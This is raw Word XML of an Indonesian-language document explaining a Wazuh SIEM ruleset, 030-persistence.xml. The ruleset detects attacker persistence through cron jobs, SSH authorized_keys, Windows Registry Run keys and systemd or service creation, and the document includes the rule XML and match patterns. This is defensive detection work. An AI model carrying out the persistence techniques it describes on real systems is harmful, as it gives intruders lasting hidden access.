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MEKANISME PERSISTENSI, CRON, SYSTEMD, REGISTRY &amp; SSH WAZUH SIEM</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:line="276" w:lineRule="auto" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2B6CB0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>*Bedah Analisis, Rasionalisasi Bisnis &amp; Pembuktian Empiris File `030-persistence.xml` (Rule ID 100200 – 100299)*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SEC-DOC-WZH-030-PERSIST-2026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FP_TP/2904.docx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>40704.docx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>550.docx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>554.docx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>5402.docx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Setelah penyerang berhasil masuk (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Initial Access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>) dan menaikkan wewenangnya (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Privilege Escalation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">), prioritas utama mereka adalah </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1A202C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>menanamkan kaki agar tidak bisa diusir (*Establishing Persistence*)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>. Penyerang sangat menyadari bahwa sesi koneksi mereka bisa terputus sewaktu-waktu akibat reboot server, pergantian IP, atau pemutusan koneksi oleh firewall.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">File ruleset </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>030-persistence.xml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> adalah </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1A202C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>benteng pendeteksi pintu belakang (*Backdoor &amp; Persistence Sensor*)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> pada SIEM Wazuh yang bertugas menggagalkan upaya penyerang mempertahankan akses jangka panjang di infrastruktur enterprise.</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mekanisme persistensi (Tier-1 Detection) yang mengevaluasi modifikasi file konfigurasi sistem, auto-start registry, dan penjadwalan tugas otomatis yang telah dinormalisasi oleh </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>001-base-normalization.xml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>. Modul ini mengidentifikasi manipulasi penjadwal tugas Cron Linux (T1053.003), penanaman public key SSH tersembunyi (T1098.004), penambahan autostart Windows Registry Run Keys (T1547.001), dan pembuatan service latar belakang permanen Systemd Linux / Windows Service (T1543.002).</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Berdasarkan statistik industri keamanan siber, rata-rata penyerang bercokol di dalam jaringan korban (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Dwell Time</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">) selama </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1A202C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>21 hingga 200 hari</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> tanpa disadari, karena mereka berhasil menanam mekanisme persistensi yang sah di mata sistem operasi. Tanpa file ini:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Penyerang dapat menanamkan script reverse shell di </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>/etc/crontab</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> yang akan otomatis berjalan setiap jam, meskipun komputer di-reboot berulang kali.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Penyerang dapat menyisipkan kunci kriptografi mereka ke </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>~/.ssh/authorized_keys</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>, sehingga mereka bisa login kapan saja sebagai root tanpa memerlukan password dan kebal terhadap kebijakan pergantian password berkala (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Password Reset Bypass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Malware Windows dapat menyusupkan dirinya ke registry </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>CurrentVersion\Run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>, memastikan program jahat aktif setiap kali staf masuk ke komputer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>4. Penyerang dapat mendaftarkan backdoor sebagai service resmi sistem (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>/etc/systemd/system/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> atau </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>sc create</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>) yang berjalan dengan hak akses kernel/SYSTEM tertinggi.</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Memberikan deteksi berakurasi tinggi pada tingkat keparahan tinggi (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1A202C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Level 8 hingga Level 9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>) pada saat konfigurasi auto-start disentuh.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>2. Menjadi simpul kritis penutup rantai serangan (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Kill Chain Closer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">) pada skenario korelasi </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>070-correlation.xml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> (khususnya Rule 107002 - Full Intrusion Chain).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>3. Memastikan setiap modifikasi pada aset bernilai tinggi (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Crown Jewels</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">) langsung dielevasi ke status darurat </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1A202C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Prioritas P0</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("Pintu Rahasia &amp; Saklar Genset Otomatis")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Untuk menjelaskan konsep Persistensi secara non-teknis kepada jajaran direksi:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto" w:before="80"/>
        <w:ind w:left="576" w:right="576"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2C5282"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>*"Bayangkan gedung kantor kita berhasil dimasuki oleh penyusup di malam hari karena ada jendela yang lupa dikunci.*</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*Penyusup tahu bahwa besok pagi jendela itu pasti akan ditutup dan dikunci oleh petugas kebersihan.*</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*Agar dia bisa keluar-masuk gedung sesuka hati di kemudian hari tanpa perlu membobol jendela lagi, penyusup melakukan 4 hal:*</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto" w:before="80"/>
        <w:ind w:left="576" w:right="576"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2C5282"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>1. *Dia menduplikasi kunci pintu darurat belakang dan menyembunyikannya di bawah pot tanaman (SSH Authorized Keys / Rule 100201).*</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto" w:before="80"/>
        <w:ind w:left="576" w:right="576"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2C5282"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>2. *Dia memprogram jam weker gedung agar membukakan pintu belakang otomatis setiap pukul 02.00 dini hari (Linux Cronjob / Rule 100200).*</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto" w:before="80"/>
        <w:ind w:left="576" w:right="576"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2C5282"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>3. *Dia menyambungkan kabel saklar lampu lobi ke saklar genset cadangan, sehingga begitu listrik menyala, radionya otomatis menyala (Windows Registry Run Key / Rule 100202).*</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto" w:before="80"/>
        <w:ind w:left="576" w:right="576"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2C5282"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>4. *Dia mendaftarkan dirinya ke komputer HRD sebagai petugas cleaning service resmi shift malam agar satpam tidak curiga (Systemd / Windows Service Creation / Rule 100203).*</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*File `030-persistence.xml` adalah sensor audit yang memantau setiap kali ada kunci baru yang dibuat, setiap kali jadwal gedung diubah, dan setiap kali ada pegawai baru yang didaftarkan. Dengan menangkap tindakan ini, kita bisa mengusir penyusup secara permanen, bukan hanya menutup jendela."*</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Biaya Dwell Time (Business Risk &amp;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Penanaman Backdoor</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Dampak Finansial &amp; Operasional Tanpa Modul Ini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Nyata Modul `030-persistence.xml`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Penanaman Kunci SSH Diam-diam</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Peretas bebas keluar masuk server database pelanggan kapan saja. Investigasi insiden gagal karena peretas masuk menggunakan protokol sah SSH port 22.</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100201 (Level 8).</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="2D3748"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> Setiap sentuhan atau modifikasi pada file </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C53030"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>authorized_keys</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="2D3748"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> langsung memicu alarm keamanan seketika.</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Penyusupan Jadwal Otomatis (Cronjob)</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menjalankan script pencurian data (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:color w:val="2D3748"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>data exfiltration</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="2D3748"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>) setiap tengah malam secara otomatis tanpa perlu interaksi manual.</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100200 (Level 8).</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="2D3748"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> Mendeteksi pembuatan atau pengeditan baris cron di </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C53030"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>/etc/cron*</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="2D3748"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> dan spool crontab.</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Windows Registry Run Persistence</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Malware pencuri password (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:color w:val="2D3748"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Infostealer</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="2D3748"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>) aktif kembali setiap kali laptop eksekutif/karyawan dinyalakan (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:color w:val="2D3748"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>reboot survival</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100202 (Level 8).</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="2D3748"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> Menginspeksi modifikasi key registry </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C53030"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>CurrentVersion\Run</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="2D3748"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> secara real-time.</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Backdoor Layanan Permanen (Systemd)</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Penyerang menanamkan service daemon berbahaya yang berjalan seumur hidup server dengan wewenang tertinggi root/SYSTEM.</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100203 (Level 9).</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="2D3748"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> Menandai pembuatan file unit </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C53030"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>.service</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="2D3748"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> baru atau eksekusi perintah </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C53030"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>sc.exe create</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="2D3748"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>.</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(`030-persistence.xml`)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(`030-persistence.xml`)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Pendeteksian Backdoor</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Pasif; tim keamanan hanya menyadari adanya backdoor setelah terjadi kebocoran data berbulan-bulan kemudian.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Proaktif &amp; Real-Time.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="2D3748"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> Upaya penanaman backdoor terdeteksi pada detik pertama saat file konfigurasi disentuh.</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Ketahanan Pasca-Remediasi</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Akun peretas ditutup, tetapi server masih terinfeksi karena peretas meninggalkan cronjob atau SSH key tersembunyi.</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Remediasi Tuntas 100%.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="2D3748"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> Analis SOC mengetahui titik persis lokasi persistensi ditanam, memastikan pembersihan menyeluruh.</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Korelasi Rantai Serangan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Modifikasi cron dianggap sebagai tugas admin biasa tanpa dicurigai keterkaitannya dengan insiden login sebelumnya.</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Korelasi Terhubung (Kill Chain).</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="2D3748"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> Modifikasi auto-start yang terjadi setelah kompromi akun otomatis dielevasi menjadi insiden darurat P0.</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Cakupan Multi-Platform</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Terbatas pada pemeriksaan Windows atau Linux secara parsial.</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Terpadu.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="2D3748"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> Melindungi Linux (Cron, Systemd, SSH) dan Windows (Registry Run, SC Service) dalam satu modul standar.</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100200 – 100203)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Struktur file </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>030-persistence.xml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030-persistence.xml</w:t>
              <w:br/>
              <w:t xml:space="preserve">  Purpose: Persistence via Registry Run Keys, Cron, Systemd, SSH authorized_keys</w:t>
              <w:br/>
              <w:t xml:space="preserve">  Rule Range: 100200 - 100299</w:t>
              <w:br/>
              <w:t>--&gt;</w:t>
              <w:br/>
              <w:t>&lt;group name="persistence,"&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Berikut adalah dekomposisi komprehensif dari ke-4 rule deteksi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100200 — Cron Table or Scheduled Task Modified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id="100200" level="8"&gt;</w:t>
              <w:br/>
              <w:t xml:space="preserve">  &lt;if_group&gt;base_normalized&lt;/if_group&gt;</w:t>
              <w:br/>
              <w:t xml:space="preserve">  &lt;match&gt;/etc/cron|/var/spool/cron|/etc/crontab&lt;/match&gt;</w:t>
              <w:br/>
              <w:t xml:space="preserve">  &lt;description&gt;PERSIST: Cron table or scheduled task modified&lt;/description&gt;</w:t>
              <w:br/>
              <w:t xml:space="preserve">  &lt;group&gt;persistence,scheduled_task,cron,&lt;/group&gt;</w:t>
              <w:br/>
              <w:t xml:space="preserve">  &lt;mitre&gt;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    &lt;id&gt;T1053.003&lt;/id&gt;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100200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Critical System Modification)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T1053.003 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Scheduled Task/Job: Cron</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event normalisasi dari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/etc/cron</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
